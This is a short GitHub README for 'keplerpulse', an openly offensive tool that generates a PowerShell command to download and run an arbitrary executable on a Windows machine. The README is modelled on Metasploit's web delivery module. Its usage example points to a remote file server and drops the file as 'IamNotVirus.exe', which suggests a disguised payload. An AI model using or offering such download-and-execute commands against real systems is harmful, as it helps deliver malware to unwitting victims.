Skip to content

Files

Latest commit

 Cannot retrieve latest commit at this time.

History

History
17 lines (12 loc) · 621 Bytes

README.md

File metadata and controls

17 lines (12 loc) · 621 Bytes

keplerpulse

KeplerPulse is a tool that generates a Powershell command that once executed on a Windows Machine, Downloads and executes your desired Executable on it.

That's it.

This was inspired by metasploit's web delivery module, But KeplerPulse isn't popping shells or hosting directly. Basically you can create such command without this tool.

USAGE

git clone https://github.com/quantumcore/keplerpulse
cd keplerpulse
sudo ./install.sh
keplerpulse --p https://myfileserver.com/hi.exe --t C:/Users/%USERNAME%/IamNotVirus.exe 

Whatever you may do with keplerpulse is your own responsiblity.